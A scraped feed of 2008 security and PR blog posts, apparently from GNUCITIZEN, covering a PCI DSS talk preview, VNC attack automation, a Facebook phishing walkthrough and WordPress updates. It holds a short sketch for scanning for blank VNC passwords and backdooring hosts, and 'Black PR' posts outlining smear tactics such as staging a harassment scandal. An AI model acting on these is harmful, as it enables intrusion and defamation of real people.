 I’d like to personally thank Andrzej Targosz for inviting me to speak this year, making it the second time I’ll deliver a presentation at CONFidence. I hope my presentation will be interesting and entertaining enough for the audience. This is the abstract for my talk:
 You are a security geek, you specialize in pentesting, but somehow during your career you’ve had to deal with PCI DSS. Yes, PCI DSS can be very boring, I feel your pain! Pentesters usually don’t like standards because they understand that there is only so much they can do to help organizations protect their information assets. On top of that, pentesters usually like to experiment which goes against the principle of boring audit checklists.
 In this presentation, we will cover PCI DSS and credit card security from a (hopefully) fun perspective, with a focus on credit card theft techniques. How are merchants and service providers being compromised? How about us consumers? What loopholes currently exist in the PCI DSS standards which still allow unsophisticated attackers to compromise credit card data?
 This presentation is not brought to you by a PCI DSS expert, but rather a frustrated pentester who will attempt to show you that PCI DSS and credit card security in general can be a fun topic! Knowledge learned from performing pentests and from working with QSAs who have assessed compromised data centers will be shared.
 Of course, if you have any thoughts on things you think I should cover in my presentation I’m all ears!
 Talks I’m interested in
 I must say that there are quite a few presentations that look interesting, but it was Rich Smith’s abstract on attacking VNC that caught my eye the most.
 The reason why I’m interested in this talk is because Rich is basically answering a question I asked myself a long time ago when the infamous VNC auth bypass vuln was discovered: can we programmatically run commands via the Remote Frame Buffer (RFB) protocol which VNC relies on? It seems that Rich has done a heck of a job at answering this question!
 I remember exploiting the VNC auth bypass bug during pentest assessments. Basically, once you gained access to the desktop two things could happen: 1) the screen is locked and you’re stuck, 2) the screen is unlocked and you gain access to the currently-logged-in user’s session.
 In the second case, you can obviously do anything including running commands of course. So if the logged-in user has admin privileges on the box, it’s a full compromise pretty much. However, the attack can be very noisy, since the attacker is graphically interacting with the desktop. For instance, imagine if the admin was physically sitting in front of the compromised system while watching someone else opening the command prompt, etc. Another scenario which can arouse suspicion is the admin remotely VNCing into the box. If the attacker also connects via VNC to the same box, that would kill the admin’s VNC session. Quite noisy as you can imagine.
 So my question back then was, could someone programmatically compromise a box via VNC and then launch a malicious payload? i.e.: adding a new OS account. I must say that I dug a bit back then and it’s not as trivial as it sounds, which is what Rich is arguing in his presentation, although he did manage to write a python library and suite of tools for automating tasks like this.
 Think of the following automatic task:
 scan boxes for blank VNC passwords
 if blank pass allowed, then backdoor system
 continue scanning
 Fun indeed!
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Codez Are Up
Wed, 11 Mar 2009 07:18:54 -0700
This is a quick announcement just to let you know that our codes are now getting synced at code.gnucitizen.org, which is basically a file browser interface to the source repositories.
 
 The reason I had to come up with something like this is because most of our projects are dispersed across several Google Code repositories, personal SVNs and many other places. We have started so many ideas in the past that now it is hard to keep track of everything. Also, many people ask us for the source codes of old projects and we simply don’t know where to point them to.
 Not everything is added yet. I will keep putting stuff in!
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



New Facebook XSS Vulnerabilities
noreply@blogger.com (Tom) — Mon, 15 Dec 2008 18:34:00 -0800
There was some buzz today about four new Facebook XSS vulnerabilities announced. XSS (cross site scripting) is nothing new for Facebook but it's interesting since there is a pretty impressive worm called Koobface still making it's way around the Facebook user base (now spreading to Bebo). Koobface spread easily through social engineering techniques and XSS has been used to assist with similar types of attacks in the past. Interesting to see if there will be a combo Koobface/XSS type attack in the future. 
I won't go into a ton of detail about these new vulnerabilities but for a very good write up on these flaws and how they might relate to other attacks going on with social media check out Dancho Danchev's article over at zdnet.



Miss “Accountable” 2008
Fri, 12 Dec 2008 12:23:39 -0800
The beauty award this year goes to the International Federation of Organic Agriculture Movements (IFOAM), followed by the European Bank of Reconstruction and Development and Unicef. The lowest reputation scores, however, were received by International Olympic Committee and NATO. Not surprising at all ! You should not expect that military and sport organizations would have been ranked higher than that, especially when their image is closely related to the general image of the services they offer and the image the places where their headquartered are based. Being accountable is also a tough task for most corporations as they fail to deploy effective policies and active management systems.
 The Contest: According to the latest survey of One World Trust (a British Think Tank), the IFOAM, along with 29 other powerful organizations, have been assessed in terms of their accountability to stakeholders and wider public. The scope of the research was based on the assessment of four major criteria such as transparency, participation with outsiders, evaluation and complains handling. Turns out that none of the companies actually managed to score higher than 70 percent accountability which is very low and insufficient result. The official report also states:
 A score of 70 percent indicates that an organisation has policies in place that meet only some good practice principles and the basic management systems to support their implementation. This is the floor, not the ceiling, of accountability capabilities. If global organisations are to be part of the solution to global challenges, there needs to be a step change in their approaches to accountability. They need to start implementing the more challenging accountability reforms which truly empower external stakeholders to hold an organisation to account. Organisations must also take the necessary steps to embed accountability in their culture and ensure it is being translated into practice.
 The other interesting conclusion that has been made is that all of the evaluated companies failed to show good scores (more than 50 percent) in their transparency policies and complaint handling procedures. It is funny that Transparency International (a global organization that tries to fight corruption) takes one of the lowest positions in this chart. Why is this so important? Well, from a Black PR perspective, these are pretty severe vulnerabilities. If an attacker manage to hack into the corporate complaint tracking software and steals all of the important data, he can easily turn that into a massive negative campaign. The affected organization will be not only caught into a very awkward situation, but it will be unable to respond properly to the increasing flow of stakeholders complaints. This also leads to intense media attention and general public dissatisfaction.
 One more thing – I did a little research on my own and I found out that the Google Page Ranks of the less accountable organizations is way higher than the the Page Rank of the organizations on the top of the list. However, if you type their name and the word reputation into the search box, you will find that the first couple of pages are filled with negative publications and comments . I guess popularity is not always proportionally related to the general stakeholders’ respect.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Crisis Communication Is Like …Surfing
Wed, 10 Dec 2008 11:57:31 -0800
I don’t know about you but today I have started writing my New Year’s Resolution List. One of the things I am eager to do next year is to learn how to surf. It’s cool, risky and very challenging. What I like most about it is the sense of uncertainty and the way you need to survive with a minimum set of resources.
 Surfin is like crisis management, don’t you think? If you actually compare some of the basic tutorials in both disciplines, you will probably find a lots of similarities. So, once you master the ability to stay upright on the board, you can easily gain a confidence for dealing with some of the most severe crisis in the corporate world.
 How to Start
 When a crisis occurs, the first thing to consider is finding the balance point. Use your company’s strengths and all those positive qualities that cannot be doubted by the others. This will help you to balance out all the negative publications and unfair accusations. For example, if your organization is being socially responsible and undertakes many charitable events, this actually can help to save your stakeholders’ trust and turn the crisis into unexpected corporate profit.
 The second crucial habit that must be developed is the ability to respond as quickly as possible to the changing environment. The speed is absolutely everything for both surfing and crisis management. It gives you not only a competitive edge, but also the power to predict every negative outcomes. At the same time, do not forget to keep it low once you get the situation back in control. In almost every zoology book it is stated that the most dangerous moments for the target is right after its escape form the predator. So if you keep looking at your feet, you will definitely fall down again. Instead, you should “cover the back of your head” and protect all your vital assets from further damages. Stay “under the water” as long as you can, but never lose the honesty in your conversations.
 Safety should always be in the back of your mind, which is a reason why you should never be surfing alone. You never know what might go wrong even on the smallest of waves – its good to have someone who can help you out if you get into trouble.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Back In The Classroom: Noam Chomsky on Corporate Propaganda Techniques
Fri, 05 Dec 2008 12:03:59 -0800
I just stumbled across an old video on YouTube and I think it is worth sharing. The video is about the origin of the Public Relations industry in the US and why the modern democratic societies need to be manipulated.
 
 As it turns out, the free public mind is one of the greatest threats to many corporations and political regimes as it could easily destroy their long-term goals, ideologies and operations. Chomsky also says that the idea of democracy gives an enormous, anarchic power to the regular people, which could be quite harmful to the society in general. Actually, propaganda is one of the Chomsky’s favorite topics as he wrote many books about it – Media Control: The Spectacular Achievements of Propaganda, Manufacturing Consent: The Political Economy of the Mass Media and Propaganda and The Public Mind: Conversations with Noam Chomsky. Great reads for those who are interested.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



A Note For Hillary: Stop Tarnishing The Democratic Values
Wed, 03 Dec 2008 14:41:08 -0800
It is official! Hillary Clinton is finally appointed as the new Secretary of State. Congrats!!!! Let me tell you, this lady is everything, but a loser and will do everything just to get to the power of the state. It seems like she is absolutely capable of taking every political position you can think about of – a first lady, a senator, a president wanna-be, a vice president and if all this fail why not a head of international affairs. There is nothing wrong with this, except that the recent political history is entirely dominated by families like the Bushes and the Clintons. Looks like once you taste the power of the White House, it is not easy to give it up. I cannot help but wonder, where is the real change that we are awaiting for so long?
 Funny enough, just few weeks ago both Hillary Clinton and Barack Obama said that they want to improve America’s standing in the world. The Democart’s victory was easily labeled by different media outlets as “historic” and has put hopes for a brighter future not only in US, but also in the whole world itself. Barack Obama is not just the first black president; he is a symbol of new political standards, a chance of economic survival and a representative of new class of world leaders. For a first time in many years (maybe after Nelson Mandela’s jail release), people all over the world were united in something bigger than their own social troubles. They were proud of the choice they made and were actually interested in following the news, counting the votes and somehow been personally involved in the whole competition.
 What happened?
 Let me take you back to the time when Hillary Clinton tried to “nominate” herself as a potential candidate for vice-presidency. Every rational political analyst at that time fiercely criticized the opportunity of pairing the “two former rivals” into the same election list. Moreover, it was said to be an absolutely wrong move and a second chance for Bill Clinton to overshadow the upcoming cabinet. Hillary was also seen as an obstacle that could put many prospective voters off the Obama’s political platform. Not to mention about the numerous dirty tricks that both candidates used to play to each other. Actually the fight between them was even more bitter and more aggressive than the one with the Republicans.
 Today, after the election, the partnership between Obama and Clinton has been suddenly seen as logical conclusion of a long, exhausting race. However there are still a couple of issues that must be considered. Hillary is not the type of a woman that will be easily controlled. No matter how suitable or experienced she is for being a Secretary of State, she also has a wide network of business/political connections which could put her into a great dominance over the rest of the crew. This means that her political leverage will be getting stronger and stronger each day, which kind of makes this team ineffective at its very beginning.
 Bottom Line:
 One of the good things about Democracy is the idea of free choice. The American people were actually unable to vote about the alliance between Hillary and Obama (as it would happen if she was officially named his running mate). Now they are forced to accept it. All this raises the question if we ever had the opportunity to choose between different democratic alternatives or everything was already set up as part of a nasty, political scenario. No matter how good it sounds in theory, the change has been already made, unfortunately not by us.
 Definitely not a good sign for the American reputation!
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Wordpress Upgrades to 2.6.5
noreply@blogger.com (Tom) — Sat, 29 Nov 2008 21:42:00 -0800
A reminder to all you Wordpress users...make sure you update to version 2.6.5. From the Wordpress Blog:

"The security issue is an XSS exploit discovered by Jeremias Reith that fortunately only affects IP-based virtual servers running on Apache 2.x. If you are interested only in the security fix, copy wp-includes/feed.php and wp-includes/version.php from the 2.6.5 release package. 2.6.5 contains three other small fixes in addition to the XSS fix. The first prevents accidentally saving post meta information to a revision. The second prevents XML-RPC from fetching incorrect post types. The third adds some user ID sanitization during bulk delete requests.

...note that we are skipping version 2.6.4 and jumping from 2.6.3 to 2.6.5 to avoid confusion with a fake 2.6.4 release that made the rounds. There is not and never will be a version 2.6.4."
If you get something that tells you to install 2.6.4...don't do it! :-)


“Big”, “Small” and “Fat” Reputations (The Healthy Edition)
Thu, 27 Nov 2008 11:36:47 -0800
In the mood of the upcoming Christmas feasts, here are our tips of how to stay corporate fit during the season. As you know, during this time of the year most companies are quite busy with the execution of various sales campaigns or are rushing to close important deals right before New Year’s Eve. Christmas also means lots of parties, reunions and gatherings. However that urge for having a fresh start sometimes cost millions to the organizations as they tend to neglect their competitors and therefore easily become victims of lethal reputation attacks. While many attribute the cause for this as an excessive preoccupation during the holidays, much of the Black PR cases are due to the carelessness of managers to assess security threats and their actual frequency. CEOs also foolishly underestimate the objectives of negative campaigning and refuse to believe that someone will ever dare to affect their flawless corporate systems.
 I don’t think is even worth mentioning it here how idiotic approach this is and to be honest many organizations deserve their own reputation misery. So instead of spending quality time with friends and families, many employees end up the year setting crisis teams and fighting bad publicity. Sounds like lots of fun, isn’t it?
 What is the healthy diet?
 First of all, I think it is very important for corporations to understand the power of a good reputation. Although it is not something that you can touch and hold in your hands, having a good name (personal or a brand) is the only thing that matters at the end of the day. It affects not only your annual financial reports, but also it gives you a competitive edge and a whole new meaning of your marketing strategies, internal relations and in general sales performance. Companies with strong reputation are more likely to recover from severe crises, than the ones with inconstant behavior and negative image.
 Secondly, there is a common misunderstanding which I want to clarify. Usually when PRs talk about reputation, they tend to refer to it as good or bad one. The truth is that the reputation of an organization can be much more colorful as it can take many different shapes or sizes. Keep also in mind that the corporate image means different things for the different stakeholder groups, such as employees, suppliers, shareholders and the media. It is vitally important to keep the balance between them as you risk to put yourself in a very untrustworthy position.
 The size always matters
 There is no big or small reputation. It is all relative. Companies with big reputations are those with a greater popularity among the general public. This s the case with Body Shop. Everyone think of Body Shop as a company that is deeply concerned with the environment, fair trading and biologically clean products. This is something that nobody doubts or dare to counter.
 Organizations with small reputations are those that fail to established any strong images in the minds of the audience. Usually those are start-ups or corporations with controversial past and lack of political protections. Even worse – firms with no individuality and international media presence.
 The question here is what will happen when these two types of reputation collide. Obviously it will be much easier for a bigger organization to smash down the smaller one. It has wider network of connections, more money and better PR team. The smaller competitor won’t even noticed that they are being a victim of Black PR campaign or even if they do, nobody will believe them or even want to invest in an entity without any market future.
 However if a start-up succeeds in the defamation of a bigger company, it will automatically position itself as better consumer alternative and even secure its own market place. This opportunity is especially seductive for the retail industry. The only difficult thing here is the creating of an effective Black PR strategy and a new marketing plan for after that.
 So, take the tape measure and prepare for the upcoming festivals!
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Britney Spears And The Art of Self-defamation
Fri, 21 Nov 2008 12:33:15 -0800
There is a new documentary coming up this weekend on MTV about Britney Spears. It is called Britney: For the Record and it aims to rebuild her reputation after months of a total meltdown. It is expected to be a heart-breaking story about her emotional collapse and the way she completely lost her way to the top. Funny enough, MTV was blamed a year ago that it deliberately helped destroying her image by letting her on stage of the MTV Music Awards 2007. If you remember well she was brutally criticized by the tabloids at that time for her poor performance and horrible look, which put Spears even into a deeper depression. Britney easily became a synonym of psychological disorder and a topic of numerous humorous plots. For more then a year people all over the world were literally shocked by her tabloid-chronicled personal spiral that has included rumors of drug and alcohol abuse, a scalp-shearing breakdown, a few trips through rehab, visits from the department of child welfare, and a lot of genital exposure.
 What is happening now?
 For the last couple of months, the falling POP-star suddenly raised from the ashes. It was not something that I expected to occur so soon, at least not with the same magnitude. Today, Britney Spears looks like an entirely different person. She behaves well, spends quality time with her two sons, hits the top charts with a brand new single and even won two MTV awards. Larry Rudolph, her manager, kindly refers to as the official beginning of the comeback. However I couldn’t help but wonder, is it really a comeback or a well-designed reputation strategy?
 There are a few disturbing things which make me reason that Britney Spears’s brake-down could be part of a complex, self-created Black PR campaign. I know this sounds insane! Who could possibly do this to himself, but if you think about it – Why NOT???
 First of all, Britney released her fifth album, Blackout, right in the peak of her emotional troubles. Ask any reputation advisor and he will tell you that this is a wrong move, especially when you carry such a horrible media karma. That is completely true, but not if your singles are all about depression, self-lost and bad decisions. What would be a better way to promote your label, but your own self-destructing life. Keep also in mind that the target audience of the album is mainly composed of teenagers and I don’t even want to start discussing the emotional problems this particular group have to go through. What I am trying to say is that, Britney’ life may be seen from some as a total wreck, but for others (young troubled girls) it is empathy, etc.
 On the other hand, people love to see their idols falling down. They want to assure themselves that the celebrities are just regular people as everyone else and have the same domestic and professional problems. This is how I can personally explain the whole hysteria around reality programs and behind the scenes features.
 Believe me, Britney Spears’ record company knew this extremely well and as a result Blackout set the record for the biggest-selling digital album debut by a female artist in a week.
 New Album requires a New Image
 The next album of Britney Spears, Circus, is set to be released on 2th Dec (her birthday). The date it is not accidental. It should mark her comeback and new personal stage of life. She will be portrayed as more mature and emotionally stronger woman and she will probably start aiming at different type of audience.
 Britney already looks different. She has better style, better figure, boosted self-esteem and professional attitude. She seems quite womanized and in peace with herself. All she needs to do now is to start excusing herself and her recent behavior. She is aiming at people’s compassion and fortunately for her, we all like to forgive.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Collateral Reputation Damage
Wed, 19 Nov 2008 15:09:42 -0800
There is a new reputation term I stumbled across yesterday (via Authenticorganizations blog) so I thought it is worth discussing it. It is called collateral reputation damage and the idea behind it is that some companies could be incidentally defamed, just by having random similarities with another, less respectable organizations or individuals. According to the author:
 The collateral damage, (is) not intentional damage, because the folks taking action don’t intend to damage the organization�s reputation. Instead, the damage occurs through guilt by association
 How does it work?
 The most popular example of collateral damage is when two similar names (let’s refer to them as A and B) are being negatively associated with each other. Usually there is no any relevant connection between them, except their names, nicknames, corporate symbols or initials. Visual resemblance is also possible. The only requirement here is one of the subjects (let’s say A) to have an established bad reputation in people’s minds. So, every time when people hear about the other one, B, they will subconsciously associate it with the negative qualities and characteristics of A. Fortunately, this works only for a very short period of time. However, it could be really damaging only if A is in the middle of a corporate/personal scandal.
 This is what happened with Sarah Pailn and the Chiliean wine Palin Syrah. According to Chris Tavelli (a wine bar owner), Palin Sayrah was one of the best selling wines in his pub before her nomination as a Republican V.P. People were constantly put off of its low price and questionable quality.
 How the affected party should react?
 Well, there is no a straightforward answer really. Everything depends on the specific situation and whether the affected organization is willing to take any further steps to rebuild its reputation. The main point here is the harmed company or the individual must distant itself from the one with a bad image and make sure to demonstrate different corporate values. If the company publicly complains about its reputation loss and provide enough evidences about it, such as significant financial drops, then it has the real chance to increase its popularity, find new markets or even entirely re-position itself. As I always say, it all depends on the abilities of finding an opportunity in the crisis.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Analysis of a new Facebook phish
noreply@blogger.com (Tom) — Mon, 17 Nov 2008 18:20:00 -0800
I recently noticed an interesting trend with Facebook. There seems to be an increase in spam and in particular a new type of phishing attempt has emerged that I have been seeing signs of on many different profiles. While phishing via Facebook is nothing new, this one is a bit different as the victim is not taken to a website that "looks" like a Facebook login page. This phish uses painfully annoying questions and pop-up's to get you to divulge your account information.

Do not go to any of the URL's mentioned in this article! You have been warned!

How does the phish work?
You will get an email or notice a wall post from one of your friends in Facebook. Note that your friend that has posted to your wall has had their account compromised or they have really fallen for the scam and have sent links out manually...more on that in a minute. 


Initial contact via email notification or wall post (below).



Notice the really bad wording of the following:
"hey has anyone messaged you to let you know your face book pictre is all over ****.com?"
Notice the bad grammar and misspelling? This should be your first clue that this is a phish and you should not check out this domain no matter how curious you are! The bad news is most people will check it out....

Next, a pop-up will appear showing a link to hxxp://rotating -destination.com.
 

  

More "enticing" wording for you to click the OK button.

 
 Clicking on this pop-up asks you to enter in the name of your friend, your name and your email.

  
 
 

Next, it takes you to this pop-up asking for your password for "registration".



After entering in your password it asks you how you found the site.


Interestingly, if you click on MySpace or Facebook it says it cannot retrieve your image.

 

After clicking on a link (they all seem lead to the same place) you will get to a page that tells you that they can't serve content to Facebook/MySpace.



Clicking the back button you will get another pop-up and after that you have to participate in an online "quiz". It's in a frame and really looks more like the ads you see online (click on the monkey, etc). This is the part that will generate ad revenue for phisher.



After the quiz you get to a screen which says that you have an image waiting for you and gives you a link to click.


Clicking on the link takes you to a site with a picture of a monkey and plays the sound of someone laughing...nice.



Finally, there is a link to a page of the bottom of this picture that takes you to a page telling you how to send this "harmless prank" to your friends....



Not sure if I have seen a phisher actually ask you for help! Makes things even easier for the phish creator. They even tell you to use "regular" email as you don't want Facebook to block you for being a "spammer"...

What's the end result?
The victim who goes to this website and enters in all the information requested will get their Facebook and/or MySpace profile hijacked (probably with an automated login script) and most likely their email compromised as well. Unfortunately, most people use the same password for both social media sites and email so this is a rather serious problem. If you or anyone you know fell victim to this phish, I advise changing your social media and email passwords immediately.

Special thanks to Greg and Tyler for helping out with the detailed analysis of this phish. Greg and Tyler do a ton of great malware analysis and they did some research to help determine if this phish was malware related. While there was no malicious downloads detected in this specific instance, Greg mentions the following additional information about this phish:
The IP of the first domain is associated with 16 malware domains have been related to malware in the past (some serving Zlob trojans and one related to bogus blogs) so don't be surprised if this scam gets more agressive in the future.
The IP is hosted with Oversee.net which is associated with about 90 instances of malware and rouge software.
There is code in the HTML where a graphic would be served up with 1 pixel x 1 pixel (essentially hidden) but that code is commented out. So at some point that graphic might have had some exploit code or perhaps used to log your IP.
Some thoughts on how not to be a victim
Here are a few things to remember so you don't become a victim of these and other types of scams:
Use a different, complex password for each of your accounts. That way if one password gets compromised all your other accounts don't get compromised as well.
Even if your friends want you to click on links, be cautious! You never know if their profiles or email accounts have been hacked!
Look for bad grammar and misspelled words as your first clue to a phish.
Check out the Facebook Privacy & Security Guide which gives you some good tips to follow when using social media websites.



Top Reputation Nightmares for CEOs
Thu, 13 Nov 2008 09:07:26 -0800
Ask any reputation strategist and he will tell you that the most vulnerable asset of any corporation is its very own leader. Actually CEO’s reputation represent around 49%-65% of overall corporate reputation and thus it is inevitable part of numerous Black PR scenarios. The reason for this is because it requires much less efforts and time to defame a person, than to concentrate on the disparagement of an entire organization.
 The objectives of the smear campaigns, on the other hand, could also be different. Usually there are two simple goals behind every reputation attack. The first one is directed at the personal qualities of the target and it aims his official resignation. Most of the time these types of attacks come from inside the company and are used when the leader is no longer suitable for the general corporate performance. It is also very convenient when he/she cannot be dismissed directly or is a great obstacle for someone’s interest. The second reason for CEO defamation is when the black- hats are trying to distract the attention of the industry’s stakeholders or are aiming to cause extra troubles for the organization. It is not a surprise that this is a very common situation during important events like new product launching or some forthcoming acquisitions.
 Due to the high volume of recent reputation attacks, I tried to summarize the most common malicious scenarios that CEO’s could be involved in. Of course, there are a lot more scenarios than those that I have listed. Keep in mind that everything depends on the creativity of the attacker. The golden rule here is that the more uncommon the plan is, the more effective the results would be.
 
Sexual Harassment – This is the most popular type of attack that a leader could face. It is quite easy to be proved and works almost every time. All you need to do is to find a suitable victim, sufficient evidences and a tabloid editor, willing to pay enough for the story. Once the scandal is triggered, you can just sit down and relax.
Hypocrisy – The point here is to reveal a discrepancy between leader’s official attitude and his actual deeds. The latest example is the Sara Palin fashion affair. The problem there was not that she likes to wear very expensive, designer clothes, but the fact she is not a regular American girl as she had been trying to portray herself.
Membership of controversial groups – This is a really powerful approach. If you can prove that the CEO is a part of a mob gang, religious cult or secret society, than his media crucifixion will be certain. The corporate long term strategies will also be affected.
Professional Incompetence – if the leader is incapable of making good decisions and taking responsibilities of his action , then the quality of the corporate services will be put under a serious suspicion. This is pretty scary for most of the B2B type of companies.
Misuse of corporate resources (Embezzlement) – Financial wrongdoing and unethical behavior are probably the most significant threats to every corporate reputation.Such is the case with the Deyaar’s ex-CEO, Zack Shahin, who was suspected of embezzling over $33 millions into his personal accounts. The scandal broke earlier this year and let to his immediate discharge as the head of the biggest property developer in Dubai. According to the Gulf media sources, the company is still trying to recover its tarnished reputation and to regain the trust of its shareholders.
I want to clarify that the person who was accused of embezzling Deyaar Development’ resources is Zack Shahin , not Nasser Al-Shaikh as was stated earlier before. Mr. Al-Shekih is the current Chairman of the company and The General Director of Dubai Department of Finance. Spin Hunters apologies for any inconvenience we might caused with this post.

Indictment – When it comes to CEO’s reputation, ethical conduct is always on the top. Bernard Ebbers, the former CEO of WorldCom, learned that the hard way when he was indicted on federal charges stemming from the multi-billion dollar accounting fraud at the telecommunications giant. He was also charged of conspiracy and false filing with the Securities Exchange Commission. Today he is serving his sentence at the FCI Oakdale.
Personality and Lifestyle – The main goal of the attacker here is to reveal all the dirty secrets of the target that are not publicly known. If the leader is a drug addict, a racist or a homosexual and this type of an image is in total clash with the position he takes, then not only the reputation of the organization, he is associated with, will suffer but also the reputation of the entire industry itself.
 Bottom Line: CEO’s reputation will always be a target of professional smear campaigns. The best thing CEOs can do is to be completely honest and sincere with his PR strategic team, as this is the only way to tackle all pending reputation risks.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Facebook Privacy & Security Guide
noreply@blogger.com (Tom) — Wed, 05 Nov 2008 19:18:00 -0800
Did you know that the default privacy and security settings in most social network websites are designed to share your personal information with as many people as possible? Did you ever stop to think about how valuable your information is to the company that runs your favorite social network website? The more information you share...the more valuable you are. Are you posting too much personal information and could this information be used for things you didn't approve of?

This guide gives you suggested "baseline" privacy and security settings that you can use when configuring your Facebook account. Obviously, you can adjust these settings based on the level of risk you are comfortable with. However, this guide should give you a good starting point. In addition, I have listed five key tips in the guide that you should keep in mind when using any social network.

Why put this guide together?
I have been doing several months of research with my own Facebook account as well as gathering the input of other Facebook users to determine what the privacy and security settings should be without loosing the key features of using a social network...the networking! I found that most users of Facebook have no idea that these settings even exist! Privacy and security settings can be easily configured to help limit the amount of personal information able to be shared with just about anyone, even outside your friends list.

Please feel free to distribute this document to friends and family or use it for any security awareness campaigns. I will hopefully be keeping up with any updates to the document when Facebook changes things. I might be putting together a similar document together for MySpace. However, MySpace has a long way to go compared with Facebook in regards to privacy and security settings.

You can download the latest version of the guide from my blog here.



Negative Word-Of-Mouth made easy with Tell-a-Friend
Tue, 04 Nov 2008 07:51:11 -0800
There is a new widget that caught my eye the other day and I have been playing with it ever since. It’s called Tell-a-Friend and its general purpose is to help users to share any type of information without leaving the website where it is installed. Nothing new, you may say, but the point I want to make is that this tool actually enables visitors to access their friends with much greater speed and scope. So, instead of remembering all the contact details of your LinkedIn network, you can now spread your messages with less efforts and boring authentication requests. Convenient for ones, quite scary for others! Tell-a-Friend is a two-edged sword that can successfully build and destroy your reputation in a matter of minutes. Everything depends on the professional skills of both the black-hats and the reputation management consultants.
 It is not a surprise that most of the serious PR agencies today design Word-of-Mouth (WOM) strategies as part of their promotion services. They are well aware of the power of peer-to-peer sharing and that most potential costumers heavily rely on the advice and the input of the people they trust. A professionally executed WOM campaign is hundreds of times more effective than any other advertising platform combined with the best communication tactics, especially when it can also help boosting the sales performance and corporate operational profit.
 One of the most specific features of WOM marketing is that it barely relies on any substantial facts, but personal opinions. So, even if you read something about yourself on the Web that it is not entirely true, the measures you can take are pretty limited. It is almost impossible to start legal actions against a whole community, especially when the initial source of the rumor is hard to be identified. It is also quite stupid for a company to blame someone because of his personal believes and thus all marketing books share the opinion that customer is always right.
  I will stop here. I think it is pointless to explain further the importance of Word-of-Mouth and its global impact on corporate reputations. However, I believe it is crucial to discuss its usage as rumor spreading accelerator and general defamation tool.
 What makes Negative WOM so powerful?
 It is proven that people trust negative information way more than any superlatives. If you hear something bad about someone, this is more likely to be remembered than the high volume of positive stories you can find about that very same person. The reason for this are the libel messages with their embellishing nature which causes the drama effect. This means that if you start a rumor about something,,at the end of the day it will sound totally different from its initial form. In fact, every time when somebody repeats the story, the impact will be much bigger and stronger over the target audience. None of the other communication tools enable you to do that.
 The other thing I would like to mention is the tempo, with which viral messages could be disseminated. This is extremely important for every defamation campaign , because it disables the target to react promptly on existing reputation attacks. If the target delays its official respond or fail to give a reasonable explanation of the buzz (with enough number of facts), then the allegations will be subconsciously confirmed by the audience. Moreover, this delay may actually help the rumors to spread even more and this is how the target’s reputation can be permanently damaged.
 In conclusion, I can only say that most of the big corporations tend to underestimate the power of negative communication. They are willing to spend enormous amount of money for creating a positive buzz, but not fighting the negative one. In short term perspective, this may look reasonable, but keep in mind that there will always be someone that doesn’t like your product and will try everything to take you down. As I always say, it is up to you to decide whether this is going to happen.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Wordpress Updates to 2.6.3
noreply@blogger.com (JimShoe) — Tue, 28 Oct 2008 10:54:00 -0700
First let me thank pdp for letting me blog here. I have been reading GNUCITIZEN for a while now and I very happy to help out. 

